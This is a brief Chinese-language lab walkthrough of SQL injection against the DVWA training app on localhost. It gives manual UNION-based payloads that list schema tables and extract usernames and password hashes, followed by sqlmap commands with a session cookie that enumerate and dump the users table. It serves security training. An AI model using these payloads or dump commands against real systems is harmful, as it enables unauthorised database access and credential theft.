1.正确调试
1' and 1=1#
2.错误调试
1' and 1=2#
3.如何拿到用户数据
(1)判断列/字段数
1' order by 1#
1' order by 2#
1' order by 3#
.....................
(2)联合查询其他信息
注 :联合查询 前后查询的列数 要对应上才行
1' union select user(),database()#
user() :返回当前数据库连接用户
database() :返回当前数据库名称
(3)联合查询表
1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
如果报错,可以参考这篇文章
(4)联合查询用户名和密码
1' union select user,password from users#
4.使用sqlmap
sqlmap下载官网
https://sqlmap.org/
打开sqlmap :在下载的sqlmap目录里面打开cmd,输入
python sqlmap.py
或者
在kali中直接输入sqlmap
(1)检测漏洞
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8"
cookie 在DVWA网站里面按F12,找到网络(Network),选择第一个,在Headers里面往下翻找到Cookie,并复制。
(2)获取数据库名
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" --dbs
(3)获取指定数据库表
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa --tables
(4)获取指定数据库列/表项
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --columns
(5)获取数据
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u94n31lslhqtalv7o0tlvl19v8" -D dvwa -T users --dump